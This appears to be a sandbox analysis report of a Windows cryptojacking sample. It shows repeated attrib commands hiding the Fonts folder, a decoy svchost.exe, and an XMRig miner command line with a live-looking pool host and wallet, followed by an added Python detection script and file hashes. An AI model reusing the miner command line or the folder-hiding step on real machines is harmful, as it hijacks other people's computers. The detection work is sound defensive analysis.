C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3476
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:1204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4128
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:3532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2452
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:868
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:1312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2724
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:2880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4816
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:5088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:384
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3064
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2476
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3492
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3396
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3612
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:2620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2260
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:4348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3024
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:3148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:1204
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:4508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4336
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:1012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:3592
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4272
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
PID:5100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4232
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:4980
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵PID:4388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:5064
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵PID:2128
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1096
-
-
-
Process tree (continued). The sample keeps re-launching the same two-process hiding step; this run records 94 cmd.exe -> attrib.exe pairs, every one with the identical command lines:

  (tree depth 3)  C:\Windows\SysWOW64\cmd.exe     cmd /c attrib +s +a %SystemRoot%\Fonts
  (tree depth 4)  C:\Windows\SysWOW64\attrib.exe  attrib +s +a C:\Windows\Fonts

attrib +s marks the Fonts directory as a system object (Explorer hides system-flagged objects unless "Hide protected operating system files" is switched off); +a only sets the archive bit. Because every pair is the same command, only the PIDs and the sandbox signatures that fired on the individual attrib.exe instance differ. Signature legend: D = Drops file in Windows directory, V = Views/modifies file attributes. PIDs recur (2212, 668, 3000, 3612 and others) because Windows reuses the PIDs of exited processes over the 149 s run, so a PID alone does not identify one instance.

cmd.exe PID -> attrib.exe PID   signatures on attrib.exe
2212 -> 468
3068 -> 2524
4856 -> 2752   D
2016 -> 2504
4936 -> 1016   D
1636 -> 1068   D
4048 -> 3152   V
4064 -> 3000
1188 -> 640    D
4128 -> 2916   V
1788 -> 224    D V
5112 -> 2464   D
2512 -> 4780   D
3012 -> 3720
3192 -> 4816   V
1984 -> 1308   V
3300 -> 1352   D
1428 -> 3716
3044 -> 2808   D V
1016 -> 3588   D V
1912 -> 1504   D V
2264 -> 3008   D V
688  -> 3000   D
4492 -> 3412   D V
3532 -> 3724   D
5092 -> 224
3536 -> 2740   D V
4456 -> 2528
3524 -> 216    D
2180 -> 5088
4876 -> 4436
4516 -> 2128   V
4224 -> 1568   V
3976 -> 5084
1100 -> 4524   V
4556 -> 1960   V
3404 -> 880    D V
3588 -> 1224
2384 -> 372    V
668  -> 3980   D V
2824 -> 860
3660 -> 1012
1648 -> 3264
1668 -> 5012   V
2396 -> 1756
2348 -> 3280
4564 -> 2712   D
2604 -> 452
2212 -> 4820   D
1308 -> 1928   D
212  -> 3920   D
1100 -> 2480   D
4556 -> 4088
4428 -> 3404   V
4832 -> 3612
712  -> 2384
1752 -> 668    D
4080 -> 2308   D
4852 -> 1340   V
2636 -> 2472   D V
4568 -> 4680   D
2452 -> 3532   D V
2412 -> 4512
2348 -> 2284
5080 -> 1640
740  -> 4252   V
4588 -> 2524   V
3976 -> 1172   D V
1352 -> 3304
1960 -> 1920   D
1428 -> 3044
4936 -> 3612   D V
3444 -> 1504   V
2684 -> 3008
3636 -> 2240   D
4048 -> 3412   V
5056 -> 4148   V
408  -> 884    D
1668 -> 3724   D
2396 -> 2408
3280 -> 3232
4004 -> 452
2896 -> 2568
1316 -> 872    V
1712 -> 3960   D
4820 -> 3996
1140 -> 4588   V
1984 -> 3904   V
3492 -> 628    D
5040 -> 1628
668  -> 1508   D V
3788 -> 3636
4132 -> 1204
4508 -> 3784   D V
Separate tree roots, both running out of the Fonts directory the attrib loop above keeps hiding (the \??\ prefix is the NT object-manager path form as the sandbox reports it):

  (tree depth 1)  \??\c:\windows\Fonts\svchost.exe
                  c:\windows\Fonts\svchost.exe
                  PID 2544  -  Executes dropped EXE

  (tree depth 2)  \??\c:\windows\Fonts\KvMonXP.exe
                  "KvMonXP" -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash
                  PID 1760  -  Executes dropped EXE; Suspicious use of AdjustPrivilegeToken

The KvMonXP.exe command line is XMRig's option syntax: -o is the mining pool (stratum+tcp://max.csrss.website:5555), -u the payout address (a 95-character Monero address starting with 4), -p the pool password (x), -k keepalive, --donate-level=1 the developer fee, --max-cpu-usage=50 throttles the miner to half the CPU so the infected host stays usable, and --nicehash enables NiceHash-style nonce handling. The pool host, port and wallet are the network indicators worth blocking and hunting for; the svchost.exe name is a decoy, since the real svchost.exe lives in System32, never in Fonts.
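The three behaviours this tree exposes (attrib hiding the Fonts directory, executables running out of C:\Windows\Fonts, and an XMRig-style command line with a stratum pool and wallet) can be turned into process-creation rules. The following is an added triage example written for this page; it is not part of the sandbox report or its output format. The events are constructed from the command lines shown above plus one benign svchost.exe control, and the event field names (pid, image, cmdline) are the example's own assumption.

```python
"""Triage rules for the behaviours in this report's process tree.

Added example (editor's code, not part of the sandbox report): the rules are
the editor's; the sample events are constructed from the command lines above.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Pool and wallet exactly as they appear in the KvMonXP.exe command line above.
MINER_POOL = "stratum+tcp://max.csrss.website:5555"
MINER_WALLET = ("49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqD"
                "HfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv")

# Constructed process-creation events modelled on the tree above. This is not a
# log format exported by the sandbox; the last event is a benign control that
# must not fire any rule.
SAMPLE_EVENTS = [
    {"pid": 2212, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd /c attrib +s +a %SystemRoot%\Fonts"},
    {"pid": 468, "image": r"C:\Windows\SysWOW64\attrib.exe",
     "cmdline": r"attrib +s +a C:\Windows\Fonts"},
    {"pid": 2544, "image": r"c:\windows\Fonts\svchost.exe",
     "cmdline": r"c:\windows\Fonts\svchost.exe"},
    {"pid": 1760, "image": r"c:\windows\Fonts\KvMonXP.exe",
     "cmdline": f'"KvMonXP" -o {MINER_POOL} -u {MINER_WALLET} -p x -k '
                "--donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash"},
    {"pid": 9999, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

# XMRig options seen in the tree, plus a few common siblings (supporting evidence only).
MINER_FLAGS = ("--donate-level", "--max-cpu-usage", "--print-time", "--nicehash",
               "--keepalive", "-k", "--algo", "--coin", "--threads", "--cpu-priority")


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def is_attrib_hide(cmdline: str) -> bool:
    """attrib setting +s or +h on a path ending in \\Fonts: what every cmd/attrib pair above does."""
    return re.search(r"\battrib\b.*\+[sh]\b.*\\fonts\b", cmdline, re.I) is not None


def is_exec_from_fonts(image: str) -> bool:
    """An .exe whose image path sits directly in the Windows Fonts directory."""
    return re.search(r"\\windows\\fonts\\[^\\]+\.exe$", image, re.I) is not None


def parse_miner_cmdline(cmdline: str):
    """Return pool/wallet/flags for an XMRig-style command line, else None.

    The decisive indicator is a stratum pool URL after -o/--url; known miner
    options are collected as supporting evidence, not required for a hit.
    """
    pool = re.search(r"(?:^|\s)(?:-o|--url)[=\s]+(\S+)", cmdline)
    if not pool:
        return None
    url = urlsplit(pool.group(1))
    if not url.scheme.startswith("stratum"):
        return None
    wallet = re.search(r"(?:^|\s)(?:-u|--user)[=\s]+(\S+)", cmdline)
    flags = [f for f in MINER_FLAGS
             if re.search(r"(?:^|\s)" + re.escape(f) + r"(?=[=\s]|$)", cmdline)]
    return {"scheme": url.scheme, "host": url.hostname, "port": url.port,
            "wallet": wallet.group(1) if wallet else None, "flags": flags}


def triage(events) -> list:
    """Run the three rules over process-creation events and collect findings."""
    findings = []
    for ev in events:
        if is_attrib_hide(ev["cmdline"]):
            findings.append(Finding("attrib_hide_fonts", ev["pid"], ev["cmdline"]))
        if is_exec_from_fonts(ev["image"]):
            findings.append(Finding("exec_from_fonts", ev["pid"], ev["image"]))
        miner = parse_miner_cmdline(ev["cmdline"])
        if miner:
            findings.append(Finding(
                "xmrig_cmdline", ev["pid"],
                f"pool={miner['host']}:{miner['port']} wallet={miner['wallet']} "
                f"flags={' '.join(miner['flags'])}"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

Against the constructed events the rules produce five findings (two attrib hides, two executables in Fonts, one miner command line) and nothing for the benign svchost.exe. In production the events would come from Sysmon Event ID 1 or Windows 4688 with command-line auditing enabled. The miner rule is deliberately narrow: it needs the pool on the command line, so an XMRig build that reads its pool and wallet from a config.json, as many do, passes it and has to be caught by the Fonts-path or network rules instead.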
Network
MITRE ATT&CK Enterprise v15
Downloads (files captured by the sandbox; filenames are not present in this extract)

257 B
  MD5     f88a489a387ebc7c4c0c6b122ff6aa9b
  SHA1    197f045b81fc47892ec4b879f4b55ef1fda8f307
  SHA256  8d6df3f20ca96ef6e033fe7c442f76784bed8aad65e7272b384175e4b9412a5a
  SHA512  046a13ce212c374adf315b1d3c95bf4044feee01b44eaa91b48cb1885660899473f5934031b1fef8ee2639fa4b322e83ebea1ad42fbb9100fd3f66fd3b59c391

1.2 MB
  MD5     614a11a087f7e05063f6211c114a29ba
  SHA1    903e200c338fd0a15e87214824c7f670cc7d282c
  SHA256  dda35a9441451839439a7da695209c6164ca0e7d0159b4bc012406a8a3f18ce4
  SHA512  947521a703af5c097199001f62cefc58b65d7cf723a4afe5a3b1f0b80e16ce7f357b1874f31b1cc5f55907fc18480e903313edcee02328b2527c00559d6d9f96

4.4 MB
  MD5     5d57bf45fb91812ead7ad8da8c3936a2
  SHA1    099c88af6ea4a49d2f80123c47fe85407ec42d69
  SHA256  553b1ab96e8204792f764fe25331aef9fa4c479b11b6154551d1b609e0158019
  SHA512  66b04caac0f5e1904bbd567a25734bf80dcf8982737e7bf6c68b10f07dd955445743ba76c0bad8cabf3650ec8202f73b864553ae10e39914a7c13395ee2a5cf3

292 KB
  MD5     0a7d7ed55c4202f5106824f11ecb22fa
  SHA1    730da74e178d7b114e5d4c0f1dcc956accd4942d
  SHA256  5657876e79df5212f255b4bfb0f69df9b09be4ae833e1b170de78a37b7179595
  SHA512  45a4652d229491c936b0fd5839b335ae924d5b7ee5b05925ebb2f0bb8ca030fca9544ecf4050089b04195e877fcdae4657cd29621299e053398093ee4e5fadb7